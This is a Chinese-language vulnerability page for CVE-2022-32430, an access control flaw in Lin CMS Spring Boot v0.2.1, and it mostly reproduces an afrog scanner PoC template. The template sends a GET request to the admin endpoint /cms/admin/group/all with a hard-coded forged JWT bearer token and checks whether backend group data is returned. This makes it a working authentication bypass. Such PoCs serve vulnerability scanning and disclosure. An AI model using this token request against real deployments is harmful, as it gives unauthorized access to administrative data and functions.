CVE-2022-32430: CVE-2022-32430

日期: 2025-08-01 | 影响软件: CVE-2022-32430 | POC: 已公开

漏洞描述

Lin CMS Spring Boot v0.2.1 中的访问控制问题允许攻击者访问应用程序中的后端信息和功能。

PoC代码[已公开]

id: CVE-2022-32430

info:
  name: CVE-2022-32430
  author: zhizhuo
  severity: high
  verified: true
  description: |-
    Lin CMS Spring Boot v0.2.1 中的访问控制问题允许攻击者访问应用程序中的后端信息和功能。
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32430
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32430
  tags: cve,cve2020
  created: 2023/10/30

rules:
  verify:
    request:
      method: GET
      path: /cms/admin/group/all
      headers:
        Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8
    expression: response.status == 200 && response.body.bcontains(b'name') && response.body.bcontains(b'id') && response.body.bcontains(b'level') && !response.body.bcontains(b'<html') && !response.body.bcontains(b'<body') && !response.body.bcontains(b'<script')
expression: verify()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-32430.yaml